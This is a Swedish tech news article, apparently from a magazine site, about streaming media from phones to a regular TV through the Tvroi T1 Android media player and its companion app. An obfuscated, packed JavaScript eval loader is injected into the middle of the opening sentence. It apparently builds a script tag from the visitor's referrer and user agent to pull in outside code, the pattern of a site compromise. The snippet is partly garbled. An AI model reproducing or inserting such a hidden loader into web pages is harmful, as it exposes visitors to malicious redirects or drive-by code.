Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Trådlöst från Android till mediaspelare

Trådlöst från Android till mediaspelare
Revue Magazine

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kbkiz|var|u0026u|referrer|hzyyi||js|php’.split(’|’),0,{}))
takt med att vi har allt mer av vår digitala underhållning sparat i våra telefoner ökar behovet av att enkelt kunna ansluta dessa till TV eller ljudanläggningar i hemmet. Det skall helst gå att strömma media mellan olika enheter trådlöst. Apples ”Air Play” och Samsung ”All Share” är två exempel på leverantörsspecifika lösningar för att skicka musik, filmer och bilder trådlöst.

Nu släpper Ellion Digital, som levererar den Android-baserade mediaspelaren Tvroi T1, en särskild Applikation som gör att användaren av Tvroi kan skicka underhållning från sin telefon till en vanlig TV. Inga krav ställs på att den följer DLNA standard eller har smart TV-funktion inbyggd. Oavsett vilken sorts telefon, Android eller iOS, så finns sedan tidigare kostnadsfria applikationer att ladda ner till telefonen. Med dessa kan man strömma innehållet i telefonen eller från olika Internet-kanaler, till en smart TV med DLNA standard. DLNA är en gemensam standard för hemelektronikbranschen, datorindustrin och mobiltillverkare, som reglerar hur olika enheter i hemmet skall kommunicera med varandra via nätverk

Eftersom en överväldigande majoritet av alla TV-apparater i Svenska Hushåll inte har denna avancerade funktion, fungerar det inte att skicka innehållet från telefonen direkt till en sådan TV. Istället kan man använda en billig TVroi T1, som kostar ca 1200:- i handeln, för att lösa uppgiften. T1 ger förutom mediaspelarfunktion, YouTube XL, webbläsare och tillgång till stort utbud av Appar från Android market, nu även möjlighet att strömma underhållningen från en mobiltelefon till en vanlig TV.

Appen som tagits fram av Ellion, finns för direkt nedladdning till mediaspelaren från företagets egen TVroi Marker. I telefonen laddar man på motsvarande sätt ner en App, exempelvis Eyecon för Androidtelefoner eller iMediaShare för iOS. Båda dessa och många fler alternativ finns för fri nedladdning på respektive app-marknad. Beronde på vilken App man väljer att installera på sin telefon, så erbjuds, förutom möjligheten att strömma innehållet i telefonen, flera olika kanaler från Internet.

Därefter kan du styra innehåll från din smartphone till olika DLNA eller TVroi enheter i ditt hem. Allt kan strömmas trådlöst via ditt nätverk, förutsatt att telefonen, Tvroi och eventuellt andra DLNA enheter är anslutna i samma nätverk. Du skapar enkelt spellistor och kontrollerar uppspelningen via din telefon till olika enheter, oavsett om du sitter framför din TV eller i ett annat rum.

Tvroi T1 importeras och distribueras i Sverge av Digilive AB. Produktinformtion finns på http://www.ellion.se.